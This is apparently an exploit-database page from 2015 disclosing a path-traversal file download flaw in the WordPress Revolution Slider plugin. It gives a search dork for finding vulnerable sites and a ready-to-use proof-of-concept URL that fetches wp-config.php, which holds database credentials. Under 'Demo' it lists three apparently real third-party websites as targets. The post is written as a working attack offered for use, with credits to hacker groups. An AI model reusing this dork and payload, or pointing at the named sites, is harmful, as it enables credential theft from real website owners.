WordPress Revolution Slider Local File Disclosure

2015.01.27

Credit: JOK3R

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: \"Index of\" /wp-content/plugins/revolution-slider/

[+] Title: Wordpress slider reolusion local file download
[+] Date: 2015-01-25
[+] Author: JOK3R
[+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/
[+] Tested on: windows 7 / firefox , kali linux / firefox
[+] Vulnerable Files: /plugins/revolution-slider/
[+} Dork : "Index of" /wp-content/plugins/revolution-slider/

### POC: http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php

### Demo: 
http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
http://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php


### Credits:
[+] Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS*
And All iranian Hacker's And Exploiter's <3

[+] iran-cyber.in

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Revolution Slider Local File Disclosure

Dork: \"Index of\" /wp-content/plugins/revolution-slider/

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.